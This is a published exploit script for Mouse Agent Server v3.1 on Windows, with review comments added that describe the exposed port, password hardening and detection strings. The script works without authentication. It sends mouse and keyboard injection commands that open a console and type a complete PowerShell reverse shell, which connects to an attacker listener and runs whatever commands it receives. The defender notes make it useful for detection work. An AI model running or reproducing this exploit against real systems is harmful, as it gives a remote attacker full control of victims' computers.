# Exploit Title: Mouse Agent Server v3.1 - Remote Code Execution
# Date: 19/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.docs.kr/
# Software Link: http://192.168.8.100:8080/ (IOS/Android Mobile App Interface)
# Version: 3.1 (Windows)
# Tested on: Windows 10 / Windows 11

'''
Description:
Mouse Agent Server v3.1 is vulnerable to unauthenticated RCE by simulating
mouse/keyboard inputs to force the target to execute a PowerShell reverse shell.
It works against default configurations by sending GUI automation commands
through port 8088.
'''

# NOTE(review): this listing was recovered from a whitespace-collapsed paste;
# line breaks and indentation are reconstructed, the tokens are unchanged.
#
# Root cause as shown by this script: the server accepts plain-text
# "LIN:", "MUS:" and "KEY:" commands on a raw TCP socket and turns them into
# local mouse/keyboard input. When the "LIN:" handshake answers "LIN:OK"
# without a password, any host that can reach the port can drive the desktop.
#
# Defender notes grounded in the code below:
#   * Exposure: inbound TCP to RPORT (8088) on the Windows host. Restrict it
#     with the host firewall to the paired device, or stop the service when
#     it is not in use.
#   * Hardening: the server can demand a password (it then answers
#     "LIN:PASS"). The password is sent as "LIN:<password>" over the same
#     unencrypted socket, so it only helps on a trusted network segment.
#   * Detection: process-creation logs showing cmd.exe launching
#     powershell.exe with "-nop -w hidden" and a command line containing
#     "Net.Sockets.TCPClient", followed by an outbound TCP connection from
#     powershell.exe.

import socket
import time
import sys

# Lab addresses used by the author: LHOST/LPORT are embedded in the typed
# command line, RHOST/RPORT are the Mouse Agent Server endpoint.
LHOST = "192.168.8.101"
LPORT = 4444
RHOST = "192.168.8.102"
RPORT = 8088


def send(cmd, expect_response=False, delay=0.5):
    """Send one protocol line to RHOST:RPORT over a fresh TCP connection.

    Args:
        cmd: Command text; it is encoded with str.encode() and sent as-is.
        expect_response: When true, read one reply and return it.
        delay: Seconds to sleep after sending when no reply is read.

    Returns:
        The decoded, stripped result of a single recv(1024) when
        expect_response is true; otherwise None.

    Socket errors and the 5-second timeout are not caught here and
    propagate to the caller.
    """
    # A new socket is opened per call, so the handshake and every later
    # command travel on separate connections.
    # NOTE(review): whatever session state the server keeps is therefore not
    # tied to one TCP connection - confirm how the server scopes it.
    with socket.socket() as s:
        s.settimeout(5)
        s.connect((RHOST, RPORT))
        s.sendall(cmd.encode())
        if expect_response:
            return s.recv(1024).decode().strip()
        # NOTE(review): placement inside the `with` block is inferred from
        # the collapsed source; it only affects when the socket is closed.
        time.sleep(delay)


# Command line that the script has the server type into a console window.
# Doubled braces are f-string escapes for literal PowerShell braces; LHOST and
# LPORT are interpolated. The flags "-nop -w hidden" and the TCPClient / iex
# loop are the strings to key detections on.
psh = f"powershell -nop -w hidden -c \"$c=New-Object Net.Sockets.TCPClient('{LHOST}',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1 | Out-String);$sb=([text.encoding]::ASCII).GetBytes($o+'PS '+(pwd).Path+'> ');$s.Write($sb,0,$sb.Length);$s.Flush()}};$c.Close()\""

print("[*] Starting attack sequence")

# Handshake: an empty "LIN:" is answered with "LIN:OK" (no password needed)
# or "LIN:PASS" (password required), per the checks and messages below.
response = send("LIN:\r\n", True)
if response == "LIN:PASS":
    print("[+] Server requires password")
    password = input("[?] Enter server password (or leave blank to exit): ")
    if not password:
        print("[!] No password provided - exiting")
        sys.exit(1)
    # The password goes out in clear text on the raw socket.
    response = send(f"LIN:{password}\r\n", True)
elif response != "LIN:OK":
    print(f"[!] Handshake failed (response: {response}) - aborting")
    sys.exit(1)

# Reached with "LIN:OK" from either branch, or with the server's reply to the
# password attempt; anything other than "LIN:OK" is treated as a failure.
if response != "LIN:OK":
    print("[!] Authentication failed - check password")
    sys.exit(1)

print("[+] Authentication successful")

# Input-injection sequence: pointer moves and a click, then the text "cmd"
# and RETURN, then the command line above and RETURN. The delays give the
# desktop time to react between steps.
# NOTE(review): presumably the pointer moves and click open the Start menu -
# this depends on the target's screen layout and is not shown here.
send("MUS:MOV,-9999,9999\r\n", False, 0.5)
send("MUS:MOV,15,-10\r\n", False, 0.5)
send("MUS:CLK,1\r\n", False, 2)
send("KEY:STR,cmd\r\n", False, 1)
send("KEY:SIM,RETURN\r\n", False, 3)
send(f"KEY:STR,{psh}\r\n", False, 0.5)
send("KEY:SIM,RETURN\r\n", False, 1)

print("[+] Payload delivered - check your listener")